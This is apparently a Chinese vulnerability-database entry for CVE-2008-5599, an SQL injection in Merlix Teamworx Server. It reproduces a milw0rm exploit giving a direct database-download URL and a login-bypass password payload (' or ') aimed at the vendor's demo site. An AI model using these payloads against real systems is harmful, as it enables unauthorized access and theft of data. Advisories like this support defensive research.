ASPToys Teamworx Server 'default.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116947 漏洞类型 SQL注入
发布时间 2008-12-05 更新时间 2009-01-29
CVE编号 CVE-2008-5599 CNNVD-ID CNNVD-200812-284
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7352
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-284
|漏洞详情
MerlixTeamworxServer是一款项目管理工具软件。MerlixTeamworxServer的default.asp中存在SQL注入漏洞。远程攻击者可以借助一个登陆操作中的密码参数(又称passwd字段),执行任意SQL指令。
|漏洞EXP
[~] Merlix Teamworx Server DD/Bypass Multiple Remote Vuln.
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------


exp for demo: ( DD )

http://demo.merlix.com/teamworx/teamworx.mdb

exp for demo: ( Bypass )

http://demo.merlix.com/teamworx/default.asp

user: ZoRLu ( or dont write anything )

passwd: ' or '

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-05]
|参考资料

来源:XF
名称:merlix-default-sql-injection(47126)
链接:http://xforce.iss.net/xforce/xfdb/47126
来源:BID
名称:32660
链接:http://www.securityfocus.com/bid/32660
来源:MILW0RM
名称:7352
链接:http://www.milw0rm.com/exploits/7352
来源:SREASON
名称:4757
链接:http://securityreason.com/securityalert/4757
来源:SECUNIA
名称:33009
链接:http://secunia.com/advisories/33009